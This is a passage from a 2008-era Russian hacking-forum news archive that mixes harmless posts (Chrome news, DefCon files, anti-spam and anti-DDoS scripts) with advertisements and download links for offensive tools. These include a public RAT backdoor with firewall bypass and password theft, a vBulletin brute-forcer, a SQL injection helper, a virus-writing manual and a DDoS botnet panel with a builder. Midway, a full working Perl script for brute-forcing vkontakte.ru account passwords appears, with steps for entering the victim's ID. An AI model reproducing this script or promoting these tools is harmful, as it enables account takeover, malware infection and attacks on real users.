Архив новостей (2004-2015 год)

[Schtirliz]

SpamGift 1.0 by SN
Небольшой скрипт на PHP, добавляющий на указанную страницу сайта различный мусор в виде вымышленных адресов e-mail.На отображение основной информации скрипт совершенно не влияет.При сканировании такой страницы спамерским роботом в его базу будут добавлена целая куча “левых” адресов. Если вместе с мусором будут собраны и реальные адреса e-mail с защищаемой страницы сайта, то выбрать их среди мусора можно будет только вручную.
Хочется хоть немного осложнить жизнь этим спамерам!

Установка скрипта:

в начале защищаемой страницы добавить строку
< ? include "spam_gift.php"; ? >

рекомендую такую же строку добавить и в конце страницы, чтобы реальные адреса e-mail со страницы оказались между “левыми” для максимального осложнения ручной обработки списка спамерами.
[New$paN]
Скачать|Download
Источник: www.secnull.info

 

[Winux]

Разделы форума
Восстановлены, ранее утерянные разделы на форуме: SEO - раздел о SEO оптимизации, поисковых системах и продвижении сайта; Цифровая фотография - раздел о фотографии, фотоаппаратах и прочей фототехнике.

Также открыт новый раздел Социальные сети - раздел о взломе и эксплуатации таких социальных сетей как vkontakte, odnoklassniki, vspomni.ru, moikrug и др.

Изменение от 22.08.2008:
Еще восстановлен раздел "Электронная коммерция" - все о платежных системах (WebMoney, Paypal, Rupay), интернет-банкинге и пр. Помните, что никакого кардинга!

Новые разделы пока пустуют. Заполняйте!

P.S.: В новые разделы требуются модераторы, также как и во многие старые. Подробно.[New$paN]

 

[Schtirliz]

Разумеется, от серьезной атаки этот скрипт не спасет, но серьезная атак и стоит не одну тысячу долларов и ее еще надо заслужить Если ддосят на уровне PHP тогда это скрипт поудобней будет, он автоматом добавляет в .htaccess блокируемые IP, вначале настройка есть. Вкратце расскажу о технологии - скрипт хранит в разделяемой памяти данные о заходах за последнее время. И если количество заходов превышает критическое, то ддосера БАН ип автоматом прописывается в htaccess.Лучшая защита от DDOS - это распределенная сеть, но такое не всегда по карману или востребовано. Скрипт отбивает от небольшых ботнетов.
[New$paN]
скачать Источник: www.secnull.org

 

[Winux]

Хакерские предложения на JustHackIt

Ресурс представляет собой некий образ социалки для хакеров (без всяких фоток, видео и муси-пуси. Ресурс представляет собой набор своеобразных идей и объявлений об их совместном решении. Также возможен поиск хакеров для выполнения той или иной работы.
Записи можно всячески комментировать, обсуждаеть.
Внимание! Сайт может оказаться провокацией правительства США, так что использовать его исключительно как кладезень каких либо идей. Предоставляйте свои контакты с осторожностью.
З.Ы: предупрежу сразу что пока там особо оригинального мало. Одинокие хакеры ищут подружек, недоадмины собирают тимы и пр, но время покажет.
:zns2: Посетить ресурс
Источник: r3al.ru[New$paN]

 

[Schtirliz]

Exploit search all best site in one​

Многофункциональный СерчЭхплойтер.Это программа ищет exploits в следующих сайтах.

http://www.milw0rm.com/
http://www2.packetstormsecurity.org/
http://secunia.com/
http://www.securiteam.com/
http://securitydot.net/
http://securityvulns.com/
[New$paN]
Скачать|Download

[mod][Schtirliz:] P.S строго советую проверить файл на антивирсЫ.[/mod]

 

[Winux]

PaiN Rat 0.1 Beta 9
Новый паблик-бэкдор.
Основные особенности:
----------
- Обход фаеров (DLL Injection, ДЛЛ не пишется на хард)
- Шифрование трафика
- 4 метода автозагрузки (Shell, Policies, ActiveX, UserInIt)
- Встроенный Binder
- Многопоточная передача
- Антиотладка (Anti VMware, VirtualPC, Anubis Sandbox..etc)

Кроме того огромная коллекция бэкдорных функций, отправка паролей.
Пока не совместима с вистой.

Release date: 2008-08-06
[New$paN]
Скриншот|Screenshot
Скачать|Download
:zns2: Домашняя страница программы

 

[Winux]

Надоело везде регистрироваться? - Bugmenot

Надоело регистрироваться на куче сайтов просто чтобы посмотреть/почитать или увидеть скрытый текст? Проблема частично решена. Сервис bugmenot представляет собой онлайн базу логинов и паролей к тысячам сайтов. К сожалению, далеко не все пароли уже актуальны. В базе были актуальные пароли от damagelab в том числе. Проверил-пароли актуальны (естественно для нашего сайта я эту лавку прикрыл).

Для пользователей Firefox есть плагин, автоматизирующий использование сервиса.
BugMeNot 2.0
:zns2: Посетить сервис[New$paN]

 

[Winux]

Astalavista Security Toolbox DVD 2008 v5.0

Ежегодно международный портал по сетевой безопасности Astalavista выпускает DVD диск с огромным набором инструментов, необходимых в нашей нелегкой работе. Диск продается за n-ное количество зеленых и приходит по почте. У Вас есть возможность его скачать с любимого портала. Сам еще не докачал, так что ничего конкретного сказать не могу. Качаем (почти 3 гига):[New$paN]

Спойлер: 3 у вас 43

Скачать|Download одним файлом по прямой ссылке
или
Разбито на 3 файла:
]http://www.secuiran.com/files/astalavista_...[!--HideEEnd--]

 

[Winux]

Изменения и восстановления на проекте.
Начался сентябрь. Спешу известить всех пользователей форума, чего хорошего их ждет в новом месяце. Убедительная просьба прочитать пост до конца, тут содержится важная информация.
1) Организован новый фаилсервер для ДЛ с прямыми ссылками на закачку.
2) Восстановлен видеоархив уроков по взлому. Теперь у нас самый большой в рунете видеоархив на эту тему.
3) Идет работа над архивом литературы. Ждите совсем скоро несколько гигабайт литературы с закачкой "без проблем".
4) Полностью изменена концепция раздела товаров и услуг. Теперь все пользователи обязаны проходить проверку, в противном случае их объявление просто не появится в разделе. В разделах "Продажа" и "Услуги и сервисы" отныне только проверенные люди. Таким образом проект претендует на одну из лучших торговых площадок рунета. Заявлены новые правила разделов, все ранее заведенные темы пересмотрены. Кидалы, барыги, дети и олени отсеяны. Читать подробно.
5) В ближайшие дни будут соответственно изменены общие правила форума.
6) Восстановлен набор в приватные разделы. Изменены правила набора в приват.
7) Восстановлен Вики модуль для наших статей.
8) Ведется набор участников в вики группу и группу ньюсмейкеров.
9) В сентябре ожидается приятный сюрприз для всех посетителей портала и не только.[New$paN]

 

[Winux]

Материалы DefCon 16 (08-08-2008) - официальный CD и информация

Defcon-ежегодная международная конференция хакеров. В этом году она проходила с 8 по 10 августа. Участники конференции подготовили огромное количество докладов, видео и пр. материалов. Был выпущен и продавался диск с материалами конференции, который можно скачать ниже. Также материалы конференции доступны на официальном сайте конференции. А для Вас-все в одном флаконе (под катом). Язык к сожалению английский. 666 метров =)[New$paN]

http://rapidshare.com/files/136433431/DefC...-2008.part1.rar
http://rapidshare.com/files/136435437/DefC...-2008.part2.rar
http://rapidshare.com/files/136437533/DefC...-2008.part3.rar
http://rapidshare.com/files/136439475/DefC...-2008.part4.rar
http://rapidshare.com/files/136441357/DefC...-2008.part5.rar
http://rapidshare.com/files/136443316/DefC...-2008.part6.rar
http://rapidshare.com/files/136431373/DefC...-2008.part7.rar

 

[Winux]

Две записи интервью и передач с Кевином Митником

Представляю Вам архив, в котором содержится 2 записи программ об известном американском хакере Кевине Митнике. Обе записи на английском без перевода. Первая - запись программы "60 minutes" - интервью о жизни Кевина, истории его взломов и деятельности. Вторая-прямое включение и интервью Кевина на телеканале CNBC. Тут ему просто задают вопросы типа "когда заинтересовался взломами", "как первый раз попался". Прикольнуло то, что на суде, прокурор сказал что есть угроза, что Кевин сможет единолично использовать ядерное оружие. Это выражение послужило отстранению от пользования компьютером на несколько лет. Вообщем качайте, смотрите. Сами все увидите.[New$paN]
Скачать|Download

 

[Winux]

Vbulletin Password Brute Force, 3.6 - 3.7 version

Пассбрут для булки 3.6-3.7.
Функционал:
-Работа через прокси
-Многопоточность
-Поддержка 16-ричных паролей
-Отсев мертвых прокси
-Работа с базами брута[New$paN]

Источник: secnull.org

 

[Schtirliz]

MIM v0.2 MySQL injection Master​

Консольный помощник со SQL.
Версия 0.2
* Подбирает кол-во колонок .
* Узнает какие из них отображаются .
* Выводит USER(),DATABSE(),VERSION() .
* Выводит список таблиц .
* Mysql char().
* Считавание файла с сервера с помощью load_file().
* Слитие листов (user;pass) & etc.
* Кое-что добавлено.
Собсно сорец на python (www.python.org)
[New$paN]

Спойлер: 3 у вас 43

Скачать|Download

 

[Winux]

Google Chrome

Сегодня компания Google запускает тестовую версию браузера Google Chrome. На текущий момент новый браузер совместим лишь с операционной системой Windows. Однако команда разработчиков обещает, что такая ситуация продлится недолго, и вскоре возможность веб-поиска с браузером Google Chrome появится и у владельцев компьютеров под управлением ОС Mac и Linux. Компания подчеркнула, что Chrome создан как браузер с открытым кодом.

Ни у кого нет сомнений, что с появлением Google Chrome лидерам веб-поиска браузерам Microsoft Internet Explorer, Firefox, Safari и Opera придется потесниться. Впрочем, также никто, наверное, не верит, что в ближайшее время их постигнет судьба проекта Netscape Navigator. Поэтому, вряд ли кто оспорит высказанное представителями Google мнение, что хороших программных приложений никогда не бывает чересчур много.[New$paN]
Для ознакомления пользователей с особенностями нового браузера Google выбрала весьма оригинальный способ. Компанией был задействован легендарный создатель комиксов Скотт Макклауд (Scott McCloud), наглядно изобразивший преимущества Google Chrome на 38 страницах комикса.
Со временем проявятся все плюсы и минусы нового браузера. Если судить по программным инструментам, Chrome обещает стать быстрым, удобным и, следовательно, популярным.
Браузер построен поверх платформы для веб-приложений Apple Webkit, на которой, кстати, базируется браузер Apple Safari. Движок Google Chrome Webkit также включает технологию Google Gears, поддерживающую работу браузера в оффлайне, и виртуальную машину JavaScript Virtual Machine V8, разработанную датской командой программистов «с нуля». Одной из основных целей V8 называют ускорение загрузки JavaScript и оптимизацию расхода памяти.
Chrome будет включать некоторые популярные функции, используемые конкурентными поисковиками. Так же, как браузере Opera , в Chrome будут пиктограммы быстрого доступа, вкладки будут открываться над окнами, а не под ними, как это делается в браузере Firefox. Есть в Chrome опция секретности, подобная функции Internet Explorer InPrivate, позволяющей производить поиск и посещать сайты в анонимном режиме.

Проведение поиска в отдельных вкладках позволит ускорить поиск и разделить процессы. То есть проблемы процесса поиска какой либо вкладки не застопорят работу всего браузера.

Кроме того, браузер Chrome будет отслеживать, какое из веб-приложений чрезмерно расходует оперативную память компьютера.
Что немаловажно, в браузере реализованы различные подходы к поиску. К примеру, помимо поиска с применением вкладок, наряду с технологией Google Gears в браузере применяется интегрированная система поиска и адресации Omnibox. Также в Chrome учтены вопросы безопасности и защиты от стороннего проникновения.

Даже из столь краткого анонса очевидно, что новый браузер интересен и оригинален.

Страница закачки

 

[NoName]

Rapidleech Plugmod By Eqbal

Давольно извесный скрипт (новой сборки от Eqbal)
Действует он очень просто: Сначала скачивает файл с любого из этих сайтов: rapidshare, megaupload, MyTempDir, getfile, webfile на сервер где стоит этот скрипт, а потом уже вы можете закачивать с сервера без ограничений, отправить на email, раздробить и т д...
[New$paN]

1. Извлекаем архив
2. Закачиваем содержимое папки на сервер (например в свою папку rapid)
3. Устанавливаем 777 на папку files
Вот и все - пользуемся
Скачать|Download - прямая ссылка

Для пользователей сего продукта существует хороший форум поддрежки, на котором можно найти ответы на все вопросы, а также быстро профиксить скрипт в случаее "нововедений" На Рапиде и других сервисах

А для самых ленивых... хостинги с готовыми к приминению скриптами

 

[Winux]

Как написать компьютерный вирус

В предлагаемой вашему вниманию книге просто и доходчиво рассказывается о принципах работы компьютерных вирусов различных типов и подробно описывается процесс их создания. Книга содержит множество хорошо прокомментированных текстов, различную справочную информацию. Прочитав эту книгу, вы не только в совершенстве освоите язык ассемблера и научитесь создавать собственные вирусные программы, но и повысите свой профессиональный уровень. Кроме того, устойчивое мнение, что "вирусы пишут только гении, мудрецы и "посвященные" покинет вас навсегда.
Пособие рассчитано на пользователей, знакомых с языком ассемблера процессоров семейства x86 фирмы Intel, и может быть полезно профессиональным программистам, студентам технических ВУЗов и всем, кто интересуется программированием для персональных компьютеров на языках низкого уровня.[New$paN]
Скачать|Download

 

[Schtirliz]

вКонтакте.ru bruteforce with multi-threads
​

[*]Многопоточный
[*]Подбор по словарю
[*]Для брута можно указать ID или мыло.

Установка:
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

[New$paN]

#!/usr/bin/perl 

use IO::Socket; 
use MD5; 
use threads; 
use threads::shared; 
my @pass : shared; 

###################################### 
# C!klodoL 
# vkontakte.ru bruteforce with multi-threads 
###################################### 
$dic = 'passl.txt'; #словарь паролей 
$id = 111111; #id цели 
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 
$threads = 4; #количество потоков 
###################################### 

open (pass, "<$dic"); 

Next: 
@pass = pass(); 

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);} 
for(@trl) { $_->join; } 

sub Brut 
{ 

while (@pass){ 

$pass = shift @pass; 

$md5 = MD5->hexhash($pass); 
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80); 
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". 
"Host: vkontakte.ru\r\n". 
"Accept: */*\r\n". 
"Content-Type: application/x-www-form-urlencoded\r\n". 
"User-Agent: Mozillo\r\n". 
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". 
"Connection: close\r\n\r\n"; 
$answ = <$sock>; 
close $sock; 
print "$pass $answ"; 
if ($answ =~ /302/){ 
open (good, '>>good.txt'); 
print good "$id:$pass:$md5\n"; 
print "$id:$pass:$md5\n"; 
close good; 
exit;} 
} 

} 

goto Next; 

sub pass 
{ 
my (@mas); 
while (<pass>){ 
push @mas, $_; 
last if (@mas == 400); 
} 
chomp @mas; 
return @mas; 
}

 

[Winux]

Защита от взлома. Сокеты, shell-код, эксплойты и Разработка средств безопасности и эксплойтов

Защита от взлома. Сокеты, shell-код, эксплойты
В своей новой книге Джеймс Фостер, автор ряда бестселлеров, впервые описывает методы, которыми пользуются хакеры для атак на операционные системы и прикладные программы. Он приводит примеры работающего кода на языках C/C++, Java, Perl и NASL, в которых иллюстрируются методы обнаружения и защиты от наиболее опасных атак. В книге подробно изложены вопросы, разбираться в которых насущно необходимо любому программисту, работающему в сфере информационной безопасности: программирование сокетов, shell-коды, переносимые приложения и принципы написания эксплойтов.

Разработка средств безопасности и эксплойтов
Подробное практическое руководство по разработке средств безопасности программного обеспечения. Многочисленные примеры использования различных типов уязвимостей компьютерных систем. Детальный анализ техник взлома.

Также были исправлены все ссылки на тему хак/антихак, PHP, Delphi и *nix тематики. Продолжается обновление ссылок. Ждите.[New$paN]

 

[Одинокий Волк]

ВНИМАНИЕ УЧАСТНИКИ DaMaGeLaB!

Я открываю паблик тему, читать всем обязательно.

Мы добавляем новое особенное правило для нашего форума:

Участники форума не имеют право копи-пастить на другие форумы наши релизы/новости/статьи без указания активной ссылки на источник!

Те, кто будут копи-пастить получают бан.

Те, кто сообщат админам/супермодератором о копи-пасте на другом форуме и ссылку на профиль копипастера на нашем, получают большой респект в репутацию!
[New$paN]
Все пользователи которые будут пойманы за копи-пастом будут в большом списке в этой теме. Если это будут админы/модераторы других форумах, то этот домен будет прогнан по всем форумам в блэках.

Кто не согласен, велком в асю для обсуждения.

 

[Одинокий Волк]

Представляю вашему вниманию админку, бот легко криптуется но изучая его пакеты снифером сделал выводы у автора кривые руки.

Описание не будет, у кого есть проблемы с отстуком или с самой админкой, качаем заменяем файлы и радуемся жизни.
Кто хочет посмотреть что такое ддос ботнеты внутри есть билдер.
Всё работает у меня стоит один ботнет на нём на скринах внутри архива всё видно

http://www.xss.pro/dl/scripts/admin_for_Dream_System_DDoS_Bot_mod_by_LonelyWolf_small.jpg
[New$paN]
Скачать:

Спойлер: 1

Скачать|Download